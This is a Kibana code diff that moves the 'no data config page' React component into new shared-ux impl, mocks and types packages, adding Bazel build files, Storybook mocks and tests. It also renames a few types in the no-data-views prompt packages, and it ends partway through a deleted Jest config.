b/packages/shared-ux/page/no_data_config/impl/BUILD.bazel @@ -0,0 +1,138 @@ +load("@npm//@bazel/typescript:index.bzl", "ts_config") +load("@build_bazel_rules_nodejs//:index.bzl", "js_library") +load("//src/dev/bazel:index.bzl", "jsts_transpiler", "pkg_npm", "pkg_npm_types", "ts_project") + +PKG_DIRNAME = "impl" +PKG_REQUIRE_NAME = "@kbn/shared-ux-page-no-data-config" + +SOURCE_FILES = glob( + [ + "src/**/*.ts", + "src/**/*.tsx", + "src/**/*.mdx", + ], + exclude = [ + "**/*.test.*", + "**/*.stories.*", + ], +) + +SRCS = SOURCE_FILES + +filegroup( + name = "srcs", + srcs = SRCS, +) + +NPM_MODULE_EXTRA_FILES = [ + "package.json", +] + +# In this array place runtime dependencies, including other packages and NPM packages +# which must be available for this code to run. +# +# To reference other packages use: +# "//repo/relative/path/to/package" +# eg. "//packages/kbn-utils" +# +# To reference a NPM package use: +# "@npm//name-of-package" +# eg. "@npm//lodash" +RUNTIME_DEPS = [ + "@npm//react", + "@npm//classnames", + "@npm//@elastic/eui", + "//packages/shared-ux/page/solution_nav", + "//packages/shared-ux/page/no_data/impl", +] + +# In this array place dependencies necessary to build the types, which will include the +# :npm_module_types target of other packages and packages from NPM, including @types/* +# packages. +# +# To reference the types for another package use: +# "//repo/relative/path/to/package:npm_module_types" +# eg. "//packages/kbn-utils:npm_module_types" +# +# References to NPM packages work the same as RUNTIME_DEPS +TYPES_DEPS = [ + "@npm//@types/node", + "@npm//@types/jest", + "@npm//@types/react", + "@npm//classnames", + "@npm//@elastic/eui", + "//packages/shared-ux/page/solution_nav:npm_module_types", + "//packages/shared-ux/page/no_data/impl:npm_module_types", + "//packages/shared-ux/page/no_data_config/types", +] + +jsts_transpiler( + name = "target_node", + srcs = SRCS, + build_pkg_name = package_name(), + root_input_dir = "src", +) + +jsts_transpiler( + name = "target_web", + srcs = SRCS, + build_pkg_name = package_name(), + root_input_dir = "src", + web = True, +) + +ts_config( + name = "tsconfig", + src = "tsconfig.json", + deps = [ + "//:tsconfig.base.json", + "//:tsconfig.bazel.json", + ], +) + +ts_project( + name = "tsc_types", + args = ['--pretty'], + srcs = SRCS, + deps = TYPES_DEPS, + declaration = True, + declaration_map = True, + emit_declaration_only = True, + out_dir = "target_types", + root_dir = "src", + tsconfig = ":tsconfig", +) + +js_library( + name = PKG_DIRNAME, + srcs = NPM_MODULE_EXTRA_FILES, + deps = RUNTIME_DEPS + [":target_node", ":target_web"], + package_name = PKG_REQUIRE_NAME, + visibility = ["//visibility:public"], +) + +pkg_npm( + name = "npm_module", + deps = [":" + PKG_DIRNAME], +) + +filegroup( + name = "build", + srcs = [":npm_module"], + visibility = ["//visibility:public"], +) + +pkg_npm_types( + name = "npm_module_types", + srcs = SRCS, + deps = [":tsc_types"], + package_name = PKG_REQUIRE_NAME, + tsconfig = ":tsconfig", + visibility = ["//visibility:public"], +) + +filegroup( + name = "build_types", + srcs = [":npm_module_types"], + visibility = ["//visibility:public"], +) diff --git a/packages/shared-ux/page/no_data_config/impl/README.mdx b/packages/shared-ux/page/no_data_config/impl/README.mdx new file mode 100644 index 0000000000000..a7f73534bbd09 --- /dev/null +++ b/packages/shared-ux/page/no_data_config/impl/README.mdx @@ -0,0 +1,3 @@ +# @kbn/shared-ux-page-no-data-config + +Empty package generated by @kbn/generate diff --git a/packages/shared-ux/link/redirect_app/types/jest.config.js b/packages/shared-ux/page/no_data_config/impl/jest.config.js similarity index 80% rename from packages/shared-ux/link/redirect_app/types/jest.config.js rename to packages/shared-ux/page/no_data_config/impl/jest.config.js index 53269ab395d09..09a8f39000c1d 100644 --- a/packages/shared-ux/link/redirect_app/types/jest.config.js +++ b/packages/shared-ux/page/no_data_config/impl/jest.config.js @@ -7,7 +7,7 @@ */ module.exports = { - preset: '@kbn/test/jest_node', + preset: '@kbn/test', rootDir: '../../../../..', - roots: ['/packages/shared-ux/link/redirect_app/types'], + roots: ['/packages/shared-ux/page/no_data_config/impl'], }; diff --git a/packages/shared-ux/page/no_data_config/impl/package.json b/packages/shared-ux/page/no_data_config/impl/package.json new file mode 100644 index 0000000000000..216bba70b5d50 --- /dev/null +++ b/packages/shared-ux/page/no_data_config/impl/package.json @@ -0,0 +1,8 @@ +{ + "name": "@kbn/shared-ux-page-no-data-config", + "private": true, + "version": "1.0.0", + "main": "./target_node/index.js", + "browser": "./target_web/index.js", + "license": "SSPL-1.0 OR Elastic License 2.0" +} diff --git a/packages/kbn-shared-ux-components/src/page_template/util/constants.ts b/packages/shared-ux/page/no_data_config/impl/src/constants.ts similarity index 78% rename from packages/kbn-shared-ux-components/src/page_template/util/constants.ts rename to packages/shared-ux/page/no_data_config/impl/src/constants.ts index 92dbe1cb16279..1c4c2685433d4 100644 --- a/packages/kbn-shared-ux-components/src/page_template/util/constants.ts +++ b/packages/shared-ux/page/no_data_config/impl/src/constants.ts @@ -6,11 +6,11 @@ * Side Public License, v 1. */ -import { KibanaPageTemplateProps } from '../types'; +import type { NoDataConfigPageProps } from '@kbn/shared-ux-page-no-data-config-types'; export const NO_DATA_PAGE_MAX_WIDTH = 950; -export const NO_DATA_PAGE_TEMPLATE_PROPS: KibanaPageTemplateProps = { +export const NO_DATA_PAGE_TEMPLATE_PROPS: NoDataConfigPageProps = { restrictWidth: NO_DATA_PAGE_MAX_WIDTH, template: 'centeredBody', pageContentProps: { diff --git a/packages/kbn-shared-ux-components/src/page_template/no_data_page/no_data_config_page/index.ts b/packages/shared-ux/page/no_data_config/impl/src/index.ts similarity index 64% rename from packages/kbn-shared-ux-components/src/page_template/no_data_page/no_data_config_page/index.ts rename to packages/shared-ux/page/no_data_config/impl/src/index.ts index f8c272c8f9875..baf373726144d 100644 --- a/packages/kbn-shared-ux-components/src/page_template/no_data_page/no_data_config_page/index.ts +++ b/packages/shared-ux/page/no_data_config/impl/src/index.ts @@ -5,4 +5,11 @@ * in compliance with, at your election, the Elastic License 2.0 or the Server * Side Public License, v 1. */ + export { NoDataConfigPage, NoDataConfigPageWithSolutionNavBar } from './no_data_config_page'; +export { NoDataConfigPageKibanaProvider, NoDataConfigPageProvider } from './services'; +export type { + NoDataConfigPageProps, + NoDataConfigPageServices, + NoDataConfigPageKibanaDependencies, +} from '@kbn/shared-ux-page-no-data-config-types'; diff --git a/packages/shared-ux/page/no_data_config/impl/src/no_data_config_page.stories.tsx b/packages/shared-ux/page/no_data_config/impl/src/no_data_config_page.stories.tsx new file mode 100644 index 0000000000000..3106a5b41416d --- /dev/null +++ b/packages/shared-ux/page/no_data_config/impl/src/no_data_config_page.stories.tsx @@ -0,0 +1,39 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0 and the Server Side Public License, v 1; you may not use this file except + * in compliance with, at your election, the Elastic License 2.0 or the Server + * Side Public License, v 1. + */ + +import React from 'react'; + +import { NoDataConfigPageStorybookMock } from '@kbn/shared-ux-page-no-data-config-mocks'; +import type { NoDataConfigPageStorybookParams } from '@kbn/shared-ux-page-no-data-config-mocks'; + +import { NoDataConfigPage as Component } from './no_data_config_page'; + +import { NoDataConfigPageProvider } from './services'; +import mdx from '../README.mdx'; + +const mock = new NoDataConfigPageStorybookMock(); + +export default { + title: 'No Data/Page/No Data Config Page', + description: 'A component to display when there is no data available', + parameters: { + docs: { + page: mdx, + }, + }, +}; + +export const NoDataConfigPage = (params: NoDataConfigPageStorybookParams) => { + return ( + + + + ); +}; + +NoDataConfigPage.argTypes = mock.getArgumentTypes(); diff --git a/packages/kbn-shared-ux-components/src/page_template/no_data_page/no_data_config_page/no_data_config_page.test.tsx b/packages/shared-ux/page/no_data_config/impl/src/no_data_config_page.test.tsx similarity index 55% rename from packages/kbn-shared-ux-components/src/page_template/no_data_page/no_data_config_page/no_data_config_page.test.tsx rename to packages/shared-ux/page/no_data_config/impl/src/no_data_config_page.test.tsx index dc618a068e120..fbd897314eceb 100644 --- a/packages/kbn-shared-ux-components/src/page_template/no_data_page/no_data_config_page/no_data_config_page.test.tsx +++ b/packages/shared-ux/page/no_data_config/impl/src/no_data_config_page.test.tsx @@ -6,13 +6,17 @@ * Side Public License, v 1. */ -import { shallow } from 'enzyme'; import React from 'react'; +import { mountWithIntl } from '@kbn/test-jest-helpers'; + +import { getNoDataConfigPageServicesMock } from '@kbn/shared-ux-page-no-data-config-mocks'; + import { NoDataConfigPage } from './no_data_config_page'; +import { NoDataConfigPageProvider } from './services'; describe('NoDataConfigPage', () => { const noDataConfig = { - solution: 'Kibana', + solution: 'Solution', logo: 'logoKibana', docsLink: 'test-link', action: { @@ -24,7 +28,12 @@ describe('NoDataConfigPage', () => { }, }; test('renders', () => { - const component = shallow(); - expect(component).toMatchSnapshot(); + const component = mountWithIntl( + + + + ); + expect(component.find('h1').html()).toContain('Welcome to Elastic Solution!'); + expect(component.find('button').html()).toContain('Click me'); }); }); diff --git a/packages/kbn-shared-ux-components/src/page_template/no_data_page/no_data_config_page/no_data_config_page.tsx b/packages/shared-ux/page/no_data_config/impl/src/no_data_config_page.tsx similarity index 54% rename from packages/kbn-shared-ux-components/src/page_template/no_data_page/no_data_config_page/no_data_config_page.tsx rename to packages/shared-ux/page/no_data_config/impl/src/no_data_config_page.tsx index c21431a8107fe..f5153aa25686e 100644 --- a/packages/kbn-shared-ux-components/src/page_template/no_data_page/no_data_config_page/no_data_config_page.tsx +++ b/packages/shared-ux/page/no_data_config/impl/src/no_data_config_page.tsx @@ -7,29 +7,36 @@ */ import React from 'react'; +import classNames from 'classnames'; import { EuiPageTemplate } from '@elastic/eui'; + import { withSolutionNav } from '@kbn/shared-ux-page-solution-nav'; +import { NoDataPage } from '@kbn/shared-ux-page-no-data'; +import type { NoDataConfigPageProps } from '@kbn/shared-ux-page-no-data-config-types'; + +import { NO_DATA_PAGE_TEMPLATE_PROPS } from './constants'; -import { NoDataPage } from '../no_data_page'; -import { KibanaPageTemplateProps } from '../../types'; -import { getClasses, NO_DATA_PAGE_TEMPLATE_PROPS } from '../../util'; +const getClasses = (template?: string, className?: string) => { + return classNames( + 'kbnPageTemplate', + template ? { [`kbnPageTemplate--${template}`]: template } : '', + className || '' + ); +}; -export const NoDataConfigPage = (props: KibanaPageTemplateProps) => { - const { className, noDataConfig, ...rest } = props; +export const NoDataConfigPage = (props: NoDataConfigPageProps) => { + const { className: classNameProp, noDataConfig, ...rest } = props; if (!noDataConfig) { return null; } - const template = NO_DATA_PAGE_TEMPLATE_PROPS.template; - const classes = getClasses(template, className); + const className = getClasses(NO_DATA_PAGE_TEMPLATE_PROPS.template, classNameProp); return ( diff --git a/packages/shared-ux/page/no_data_config/impl/src/services.tsx b/packages/shared-ux/page/no_data_config/impl/src/services.tsx new file mode 100644 index 0000000000000..a7d0d118c053d --- /dev/null +++ b/packages/shared-ux/page/no_data_config/impl/src/services.tsx @@ -0,0 +1,35 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0 and the Server Side Public License, v 1; you may not use this file except + * in compliance with, at your election, the Elastic License 2.0 or the Server + * Side Public License, v 1. + */ + +import React, { FC } from 'react'; + +import { NoDataPageProvider, NoDataPageKibanaProvider } from '@kbn/shared-ux-page-no-data'; +import type { + NoDataConfigPageServices, + NoDataConfigPageKibanaDependencies, +} from '@kbn/shared-ux-page-no-data-config-types'; + +/** + * A Context Provider that provides services to the component and its dependencies. + */ +export const NoDataConfigPageProvider: FC = ({ + children, + ...services +}) => { + return {children}; +}; + +/** + * Kibana-specific Provider that maps dependencies to services. + */ +export const NoDataConfigPageKibanaProvider: FC = ({ + children, + ...dependencies +}) => { + return {children}; +}; diff --git a/packages/shared-ux/page/no_data_config/impl/tsconfig.json b/packages/shared-ux/page/no_data_config/impl/tsconfig.json new file mode 100644 index 0000000000000..40ed24ecac4d2 --- /dev/null +++ b/packages/shared-ux/page/no_data_config/impl/tsconfig.json @@ -0,0 +1,20 @@ +{ + "extends": "../../../../../tsconfig.bazel.json", + "compilerOptions": { + "declaration": true, + "declarationMap": true, + "emitDeclarationOnly": true, + "outDir": "target_types", + "rootDir": "src", + "stripInternal": false, + "types": [ + "jest", + "node", + "react", + "@kbn/ambient-ui-types", + ] + }, + "include": [ + "src/**/*" + ] +} diff --git a/packages/shared-ux/page/no_data_config/mocks/BUILD.bazel b/packages/shared-ux/page/no_data_config/mocks/BUILD.bazel new file mode 100644 index 0000000000000..0a797fd6de629 --- /dev/null +++ b/packages/shared-ux/page/no_data_config/mocks/BUILD.bazel @@ -0,0 +1,140 @@ +load("@npm//@bazel/typescript:index.bzl", "ts_config") +load("@build_bazel_rules_nodejs//:index.bzl", "js_library") +load("//src/dev/bazel:index.bzl", "jsts_transpiler", "pkg_npm", "pkg_npm_types", "ts_project") + +PKG_DIRNAME = "mocks" +PKG_REQUIRE_NAME = "@kbn/shared-ux-page-no-data-config-mocks" + +SOURCE_FILES = glob( + [ + "src/**/*.ts", + ], + exclude = [ + "**/*.config.js", + "**/*.mock.*", + "**/*.test.*", + "**/*.stories.*", + "**/__snapshots__", + "**/integration_tests", + "**/mocks", + "**/scripts", + "**/storybook", + "**/test_fixtures", + "**/test_helpers", + ], +) + +SRCS = SOURCE_FILES + +filegroup( + name = "srcs", + srcs = SRCS, +) + +NPM_MODULE_EXTRA_FILES = [ + "package.json", +] + +# In this array place runtime dependencies, including other packages and NPM packages +# which must be available for this code to run. +# +# To reference other packages use: +# "//repo/relative/path/to/package" +# eg. "//packages/kbn-utils" +# +# To reference a NPM package use: +# "@npm//name-of-package" +# eg. "@npm//lodash" +RUNTIME_DEPS = [ + "@npm//react", + "//packages/shared-ux/page/no_data/mocks", +] + +# In this array place dependencies necessary to build the types, which will include the +# :npm_module_types target of other packages and packages from NPM, including @types/* +# packages. +# +# To reference the types for another package use: +# "//repo/relative/path/to/package:npm_module_types" +# eg. "//packages/kbn-utils:npm_module_types" +# +# References to NPM packages work the same as RUNTIME_DEPS +TYPES_DEPS = [ + "@npm//@types/jest", + "@npm//@types/node", + "@npm//@types/react", + "//packages/shared-ux/page/no_data_config/types", + "//packages/shared-ux/page/no_data/mocks:npm_module_types", + "//packages/shared-ux/storybook/mock:npm_module_types", +] + +jsts_transpiler( + name = "target_node", + srcs = SRCS, + build_pkg_name = package_name(), + root_input_dir = "src", +) + +jsts_transpiler( + name = "target_web", + srcs = SRCS, + build_pkg_name = package_name(), + root_input_dir = "src", + web = True, +) + +ts_config( + name = "tsconfig", + src = "tsconfig.json", + deps = [ + "//:tsconfig.base.json", + "//:tsconfig.bazel.json", + ], +) + +ts_project( + name = "tsc_types", + args = ['--pretty'], + srcs = SRCS, + deps = TYPES_DEPS, + declaration = True, + declaration_map = True, + emit_declaration_only = True, + out_dir = "target_types", + root_dir = "src", + tsconfig = ":tsconfig", +) + +js_library( + name = PKG_DIRNAME, + srcs = NPM_MODULE_EXTRA_FILES, + deps = RUNTIME_DEPS + [":target_node", ":target_web"], + package_name = PKG_REQUIRE_NAME, + visibility = ["//visibility:public"], +) + +pkg_npm( + name = "npm_module", + deps = [":" + PKG_DIRNAME], +) + +filegroup( + name = "build", + srcs = [":npm_module"], + visibility = ["//visibility:public"], +) + +pkg_npm_types( + name = "npm_module_types", + srcs = SRCS, + deps = [":tsc_types"], + package_name = PKG_REQUIRE_NAME, + tsconfig = ":tsconfig", + visibility = ["//visibility:public"], +) + +filegroup( + name = "build_types", + srcs = [":npm_module_types"], + visibility = ["//visibility:public"], +) diff --git a/packages/shared-ux/page/no_data_config/mocks/README.md b/packages/shared-ux/page/no_data_config/mocks/README.md new file mode 100644 index 0000000000000..bcf739e2d9658 --- /dev/null +++ b/packages/shared-ux/page/no_data_config/mocks/README.md @@ -0,0 +1,3 @@ +# @kbn/shared-ux-page-no-data-config-mocks + +Empty package generated by @kbn/generate diff --git a/packages/shared-ux/page/no_data_config/mocks/package.json b/packages/shared-ux/page/no_data_config/mocks/package.json new file mode 100644 index 0000000000000..32245715f2b1b --- /dev/null +++ b/packages/shared-ux/page/no_data_config/mocks/package.json @@ -0,0 +1,8 @@ +{ + "name": "@kbn/shared-ux-page-no-data-config-mocks", + "private": true, + "version": "1.0.0", + "main": "./target_node/index.js", + "browser": "./target_web/index.js", + "license": "SSPL-1.0 OR Elastic License 2.0" +} \ No newline at end of file diff --git a/src/plugins/chart_expressions/expression_gauge/public/components/icons/index.ts b/packages/shared-ux/page/no_data_config/mocks/src/index.ts similarity index 62% rename from src/plugins/chart_expressions/expression_gauge/public/components/icons/index.ts rename to packages/shared-ux/page/no_data_config/mocks/src/index.ts index 79ef0dcad9d7a..4e6911f89e37b 100644 --- a/src/plugins/chart_expressions/expression_gauge/public/components/icons/index.ts +++ b/packages/shared-ux/page/no_data_config/mocks/src/index.ts @@ -6,5 +6,7 @@ * Side Public License, v 1. */ -export { HorizontalBulletIcon } from './horizontal_bullet_icon'; -export { VerticalBulletIcon } from './vertical_bullet_icon'; +export { getServicesMock as getNoDataConfigPageServicesMock } from './jest'; + +export { NoDataConfigPageStorybookMock } from './storybook'; +export type { Params as NoDataConfigPageStorybookParams } from './storybook'; diff --git a/packages/shared-ux/page/no_data_config/mocks/src/jest.ts b/packages/shared-ux/page/no_data_config/mocks/src/jest.ts new file mode 100644 index 0000000000000..f4f2c48e4ce03 --- /dev/null +++ b/packages/shared-ux/page/no_data_config/mocks/src/jest.ts @@ -0,0 +1,33 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0 and the Server Side Public License, v 1; you may not use this file except + * in compliance with, at your election, the Elastic License 2.0 or the Server + * Side Public License, v 1. + */ + +import type { + NoDataConfigPageServices, + NoDataConfigPageKibanaDependencies, +} from '@kbn/shared-ux-page-no-data-config-types'; + +import { + getNoDataPageServicesMock, + getNoDataPageKibanaDependenciesMock, +} from '@kbn/shared-ux-page-no-data-mocks'; + +export const getServicesMock = () => { + const services: NoDataConfigPageServices = { + ...getNoDataPageServicesMock(), + }; + + return services; +}; + +export const getKibanaDependenciesMock = () => { + const dependencies: NoDataConfigPageKibanaDependencies = { + ...getNoDataPageKibanaDependenciesMock(), + }; + + return dependencies; +}; diff --git a/packages/shared-ux/page/no_data_config/mocks/src/storybook.ts b/packages/shared-ux/page/no_data_config/mocks/src/storybook.ts new file mode 100644 index 0000000000000..5c36fc79f90a7 --- /dev/null +++ b/packages/shared-ux/page/no_data_config/mocks/src/storybook.ts @@ -0,0 +1,74 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0 and the Server Side Public License, v 1; you may not use this file except + * in compliance with, at your election, the Elastic License 2.0 or the Server + * Side Public License, v 1. + */ + +import { AbstractStorybookMock } from '@kbn/shared-ux-storybook-mock'; +import type { ArgumentParams } from '@kbn/shared-ux-storybook-mock'; + +import type { + NoDataConfig, + NoDataConfigPageProps, + NoDataConfigPageServices, +} from '@kbn/shared-ux-page-no-data-config-types'; +import { NoDataPageStorybookMock } from '@kbn/shared-ux-page-no-data-mocks'; +import type { NoDataPageStorybookParams } from '@kbn/shared-ux-page-no-data-mocks'; + +type PropArguments = Pick; + +export type Params = ArgumentParams & NoDataPageStorybookParams; + +const dataPageMock = new NoDataPageStorybookMock(); + +export class NoDataConfigPageStorybookMock extends AbstractStorybookMock< + NoDataConfigPageProps, + NoDataConfigPageServices, + PropArguments +> { + propArguments = { + solution: { + control: 'text', + defaultValue: 'Observability', + }, + logo: { + control: { type: 'radio' }, + options: ['logoElastic', 'logoKibana', 'logoCloud', undefined], + defaultValue: undefined, + }, + docsLink: { + control: 'text', + defaultValue: 'docs/link', + }, + pageTitle: { + control: 'text', + defaultValue: '', + }, + }; + + serviceArguments = {}; + + dependencies = [dataPageMock]; + + getProps(params?: Params): NoDataConfigPageProps { + return { + noDataConfig: { + action: { + elasticAgent: { + title: 'Add Integrations', + }, + }, + solution: this.getArgumentValue('solution', params), + logo: this.getArgumentValue('logo', params), + docsLink: this.getArgumentValue('docsLink', params), + pageTitle: this.getArgumentValue('pageTitle', params), + }, + }; + } + + getServices(params: Params): NoDataConfigPageServices { + return { ...dataPageMock.getServices(params) }; + } +} diff --git a/packages/shared-ux/page/no_data_config/mocks/tsconfig.json b/packages/shared-ux/page/no_data_config/mocks/tsconfig.json new file mode 100644 index 0000000000000..dc96ec41f9035 --- /dev/null +++ b/packages/shared-ux/page/no_data_config/mocks/tsconfig.json @@ -0,0 +1,20 @@ +{ + "extends": "../../../../../tsconfig.bazel.json", + "compilerOptions": { + "declaration": true, + "declarationMap": true, + "emitDeclarationOnly": true, + "outDir": "target_types", + "rootDir": "src", + "stripInternal": false, + "types": [ + "jest", + "node", + "react" + ] + }, + "include": [ + "**/*.ts", + "**/*.tsx", + ] +} diff --git a/packages/shared-ux/page/no_data_config/types/BUILD.bazel b/packages/shared-ux/page/no_data_config/types/BUILD.bazel new file mode 100644 index 0000000000000..6fa1669fcc176 --- /dev/null +++ b/packages/shared-ux/page/no_data_config/types/BUILD.bazel @@ -0,0 +1,59 @@ +load("@npm//@bazel/typescript:index.bzl", "ts_config") +load("@build_bazel_rules_nodejs//:index.bzl", "js_library") +load("//src/dev/bazel:index.bzl", "jsts_transpiler", "pkg_npm", "pkg_npm_types", "ts_project") + +PKG_DIRNAME = "types" +PKG_REQUIRE_NAME = "@kbn/shared-ux-page-no-data-config-types" + +SRCS = glob( + [ + "*.d.ts", + ] +) + +filegroup( + name = "srcs", + srcs = SRCS, +) + +NPM_MODULE_EXTRA_FILES = [ + "package.json", +] + +# In this array place runtime dependencies, including other packages and NPM packages +# which must be available for this code to run. +# +# To reference other packages use: +# "//repo/relative/path/to/package" +# eg. "//packages/kbn-utils" +# +# To reference a NPM package use: +# "@npm//name-of-package" +# eg. "@npm//lodash" +RUNTIME_DEPS = [ +] + +js_library( + name = PKG_DIRNAME, + srcs = SRCS + NPM_MODULE_EXTRA_FILES, + deps = RUNTIME_DEPS, + package_name = PKG_REQUIRE_NAME, + visibility = ["//visibility:public"], +) + +pkg_npm( + name = "npm_module", + deps = [":" + PKG_DIRNAME], +) + +filegroup( + name = "build", + srcs = [":npm_module"], + visibility = ["//visibility:public"], +) + +alias( + name = "npm_module_types", + actual = ":" + PKG_DIRNAME, + visibility = ["//visibility:public"], +) diff --git a/packages/shared-ux/page/no_data_config/types/README.md b/packages/shared-ux/page/no_data_config/types/README.md new file mode 100644 index 0000000000000..dd146f60dcf4b --- /dev/null +++ b/packages/shared-ux/page/no_data_config/types/README.md @@ -0,0 +1,3 @@ +# @kbn/shared-ux-page-no-data-config-types + +Empty package generated by @kbn/generate diff --git a/packages/shared-ux/page/no_data_config/types/index.d.ts b/packages/shared-ux/page/no_data_config/types/index.d.ts new file mode 100644 index 0000000000000..10950bcf296c8 --- /dev/null +++ b/packages/shared-ux/page/no_data_config/types/index.d.ts @@ -0,0 +1,27 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0 and the Server Side Public License, v 1; you may not use this file except + * in compliance with, at your election, the Elastic License 2.0 or the Server + * Side Public License, v 1. + */ + +import { EuiPageTemplateProps } from '@elastic/eui'; + +import type { + NoDataPageProps, + NoDataPageServices, + NoDataPageKibanaDependencies, +} from '@kbn/shared-ux-page-no-data-types'; + +export type NoDataConfigPageKibanaDependencies = NoDataPageKibanaDependencies; +export type NoDataConfigPageServices = NoDataPageServices; +export type NoDataConfig = NoDataPageProps; + +export type NoDataConfigPageProps = EuiPageTemplateProps & { + /** + * Accepts a configuration object, that when provided, ignores pageHeader and children and instead + * displays Agent, Beats, and custom cards to direct users to the right ingest location + */ + noDataConfig?: NoDataConfig; +}; diff --git a/packages/shared-ux/page/no_data_config/types/package.json b/packages/shared-ux/page/no_data_config/types/package.json new file mode 100644 index 0000000000000..1af47fb4c5028 --- /dev/null +++ b/packages/shared-ux/page/no_data_config/types/package.json @@ -0,0 +1,7 @@ +{ + "name": "@kbn/shared-ux-page-no-data-config-types", + "private": true, + "version": "1.0.0", + "main": "./target_node/index.js", + "license": "SSPL-1.0 OR Elastic License 2.0" +} diff --git a/packages/shared-ux/page/no_data_config/types/tsconfig.json b/packages/shared-ux/page/no_data_config/types/tsconfig.json new file mode 100644 index 0000000000000..7a4adfcdbecff --- /dev/null +++ b/packages/shared-ux/page/no_data_config/types/tsconfig.json @@ -0,0 +1,14 @@ +{ + "extends": "../../../../../tsconfig.bazel.json", + "compilerOptions": { + "declaration": true, + "declarationMap": true, + "emitDeclarationOnly": true, + "outDir": "target_types", + "stripInternal": false, + "types": [] + }, + "include": [ + "*.d.ts" + ] +} diff --git a/packages/shared-ux/page/solution_nav/src/solution_nav.stories.tsx b/packages/shared-ux/page/solution_nav/src/solution_nav.stories.tsx index 9613fbac42f6e..2f22aad173771 100644 --- a/packages/shared-ux/page/solution_nav/src/solution_nav.stories.tsx +++ b/packages/shared-ux/page/solution_nav/src/solution_nav.stories.tsx @@ -11,7 +11,7 @@ import { action } from '@storybook/addon-actions'; import { SolutionNav as Component, SolutionNavProps } from './solution_nav'; export default { - title: 'Page Template', + title: 'Page/Solution Nav', description: 'Solution-specific navigation for the sidebar', }; diff --git a/packages/shared-ux/prompt/no_data_views/impl/src/index.ts b/packages/shared-ux/prompt/no_data_views/impl/src/index.ts index 9483e5406da4c..48afcb7936997 100644 --- a/packages/shared-ux/prompt/no_data_views/impl/src/index.ts +++ b/packages/shared-ux/prompt/no_data_views/impl/src/index.ts @@ -8,7 +8,7 @@ export type { NoDataViewsPromptComponentProps, - NoDataViewsPromptKibanaServices, + NoDataViewsPromptKibanaDependencies, NoDataViewsPromptProps, NoDataViewsPromptServices, } from '@kbn/shared-ux-prompt-no-data-views-types'; diff --git a/packages/shared-ux/prompt/no_data_views/impl/src/no_data_views.stories.tsx b/packages/shared-ux/prompt/no_data_views/impl/src/no_data_views.stories.tsx index 56d4ec63d2eaa..748687fbda5e8 100644 --- a/packages/shared-ux/prompt/no_data_views/impl/src/no_data_views.stories.tsx +++ b/packages/shared-ux/prompt/no_data_views/impl/src/no_data_views.stories.tsx @@ -29,7 +29,7 @@ export default { const mock = new NoDataViewsPromptStorybookMock(); -export const NoDataViews = (params: NoDataViewsPromptStorybookParams) => { +export const Prompt = (params: NoDataViewsPromptStorybookParams) => { return ( @@ -37,4 +37,4 @@ export const NoDataViews = (params: NoDataViewsPromptStorybookParams) => { ); }; -NoDataViews.argTypes = mock.getArgumentTypes(); +Prompt.argTypes = mock.getArgumentTypes(); diff --git a/packages/shared-ux/prompt/no_data_views/impl/src/services.tsx b/packages/shared-ux/prompt/no_data_views/impl/src/services.tsx index cf6236429441f..b8fe90e1ef135 100644 --- a/packages/shared-ux/prompt/no_data_views/impl/src/services.tsx +++ b/packages/shared-ux/prompt/no_data_views/impl/src/services.tsx @@ -9,7 +9,7 @@ import React, { FC, useContext } from 'react'; import type { NoDataViewsPromptServices, - NoDataViewsPromptKibanaServices, + NoDataViewsPromptKibanaDependencies, } from '@kbn/shared-ux-prompt-no-data-views-types'; const NoDataViewsPromptContext = React.createContext(null); @@ -37,7 +37,7 @@ export const NoDataViewsPromptProvider: FC = ({ /** * Kibana-specific Provider that maps to known dependency types. */ -export const NoDataViewsPromptKibanaProvider: FC = ({ +export const NoDataViewsPromptKibanaProvider: FC = ({ children, ...services }) => { diff --git a/packages/shared-ux/prompt/no_data_views/mocks/BUILD.bazel b/packages/shared-ux/prompt/no_data_views/mocks/BUILD.bazel index 21099840dc91e..6f725e99b6147 100644 --- a/packages/shared-ux/prompt/no_data_views/mocks/BUILD.bazel +++ b/packages/shared-ux/prompt/no_data_views/mocks/BUILD.bazel @@ -10,8 +10,17 @@ SOURCE_FILES = glob( "src/**/*.ts", ], exclude = [ + "**/*.config.js", + "**/*.mock.*", "**/*.test.*", "**/*.stories.*", + "**/__snapshots__", + "**/integration_tests", + "**/mocks", + "**/scripts", + "**/storybook", + "**/test_fixtures", + "**/test_helpers", ], ) @@ -38,6 +47,7 @@ NPM_MODULE_EXTRA_FILES = [ # eg. "@npm//lodash" RUNTIME_DEPS = [ "@npm//@storybook/addon-actions", + "@npm//react", "//packages/shared-ux/storybook/mock", ] @@ -51,9 +61,10 @@ RUNTIME_DEPS = [ # # References to NPM packages work the same as RUNTIME_DEPS TYPES_DEPS = [ - "@npm//@types/node", - "@npm//@types/jest", "@npm//@storybook/addon-actions", + "@npm//@types/jest", + "@npm//@types/node", + "@npm//@types/react", "//packages/shared-ux/prompt/no_data_views/types:npm_module_types", "//packages/shared-ux/storybook/mock:npm_module_types", ] @@ -65,6 +76,14 @@ jsts_transpiler( root_input_dir = "src", ) +jsts_transpiler( + name = "target_web", + srcs = SRCS, + build_pkg_name = package_name(), + root_input_dir = "src", + web = True, +) + ts_config( name = "tsconfig", src = "tsconfig.json", @@ -90,7 +109,7 @@ ts_project( js_library( name = PKG_DIRNAME, srcs = NPM_MODULE_EXTRA_FILES, - deps = RUNTIME_DEPS + [":target_node"], + deps = RUNTIME_DEPS + [":target_node", ":target_web"], package_name = PKG_REQUIRE_NAME, visibility = ["//visibility:public"], ) diff --git a/packages/shared-ux/prompt/no_data_views/mocks/jest.config.js b/packages/shared-ux/prompt/no_data_views/mocks/jest.config.js deleted file mode 100644 index 1efd78b09a8b1..0000000000000 --- a/packages/shared-ux/prompt/no_data_views/mocks/jest.config.js +++ /dev/null @@ -1,13 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the 